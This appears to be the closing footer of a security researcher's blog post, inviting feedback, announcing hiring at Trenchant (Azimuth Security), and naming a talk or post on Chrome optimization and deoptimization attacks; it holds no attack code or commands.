Please feel free to contact me on twitter if you've got any feedback or question!

Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity)

Modern attacks on the Chrome browser : optimizations and deoptimizations